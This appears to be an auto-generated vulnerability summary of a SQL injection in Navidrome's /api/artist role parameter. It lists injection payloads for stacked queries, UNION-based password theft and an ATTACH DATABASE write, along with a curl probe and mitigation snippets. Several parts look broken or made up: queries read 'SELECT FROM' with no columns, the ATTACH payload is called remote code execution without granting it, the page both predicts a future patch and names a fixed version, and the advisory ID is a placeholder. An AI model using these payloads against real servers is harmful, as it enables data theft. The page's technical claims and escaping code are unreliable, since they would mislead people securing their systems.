Listen to this Post
How the CVE Works
The vulnerability in Navidrome v0.55.0 to v0.55.2 stems from insufficient input sanitization in the `role` parameter of the `/api/artist` endpoint. Attackers can inject malicious SQL queries, exploiting the SQLite backend. By crafting a specially formatted HTTP request, an attacker can execute stacked or UNION-based queries, extracting or modifying database contents. The lack of prepared statements allows direct query concatenation, leading to remote code execution or data exfiltration.
DailyCVE Form
Platform: Navidrome
Version: 0.55.0 – 0.55.2
Vulnerability: SQL Injection
Severity: Critical
Date: May 29, 2025
Prediction: Patch expected by June 5, 2025
What Undercode Say:
Exploitation:
1. Craft malicious `role` parameter:
GET /api/artist?role='; SELECT FROM users;--
2. Union-based data theft:
' UNION SELECT 1,2,3,password FROM users--
3. Stacked query RCE (SQLite):
'; ATTACH DATABASE '/tmp/exploit' AS pwn; CREATE TABLE pwn.exploit(data TEXT);--
Mitigation:
1. Patch immediately: Upgrade to v0.56.0.
2. Input validation:
func sanitizeInput(input string) string {
return strings.ReplaceAll(input, "'", "''")
}
3. Use prepared statements:
db.Exec("SELECT FROM artists WHERE role = ?", sanitizedRole)
4. WAF rules: Block suspicious patterns (`UNION`, `;–`).
5. Logging: Monitor for abnormal queries:
grep "UNION|--" /var/log/navidrome/access.log
Detection:
curl -s "http://target/api/artist?role=test'" | grep -i "error|syntax"
References:
- GitHub Advisory: GHSA-xxxx-xxxx-xxxx
- SQLite Injection Cheatsheet: OWASP
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
